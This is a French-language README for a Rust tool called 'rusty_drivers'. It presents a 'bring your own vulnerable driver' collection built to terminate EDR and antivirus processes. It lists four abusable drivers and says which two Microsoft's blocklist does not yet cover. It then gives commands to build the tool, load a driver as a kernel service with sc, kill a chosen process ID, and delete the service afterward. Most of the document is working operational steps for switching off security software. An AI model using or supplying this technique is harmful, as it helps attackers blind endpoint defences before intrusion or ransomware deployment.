
BYOVD collection
Ce projet est une collection BYOVD axée sur l'arrêt des processus EDR / AV.
Actuellement, les pilotes suivants sont pris en charge :
| Pilote | Nom d'argument | Bloqué |
|---|---|---|
| Process Explorer | process_explorer | Oui |
| Genshin Impact | genshin | Oui |
| Rentdrv2 | rentdrv2 | Non |
| TrueSight | truesight | Non |
Bloqué signifie que le pilote figure dans la liste de blocage de Microsoft et ne peut pas être exécuté sur un Windows à jour.
cargo build --release
rusty_drivers.exe --help
Usage: rusty_drivers.exe --pid <PID> --driver <DRIVER>
Options:
-p, --pid <PID>
-d, --driver <DRIVER>
-h, --help Print help
-V, --version Print version
Étant donné que l'exécutable n'enregistre pas de service pour exploiter le pilote, cela doit être fait manuellement :
sc create Test123 binpath= c:\test\<DRIVER>.sys type= kernel start= auto
Ensuite, le service peut être démarré :
sc start Test123
Enfin, pour arrêter le processus avec le PID 1234 à l'aide du pilote Process Explorer, la commande suivante peut être utilisée :
rusty_drivers.exe --pid 1234 --driver process_explorer
N'oubliez pas de nettoyer le service ensuite :
sc stop Test123
sc delete Test123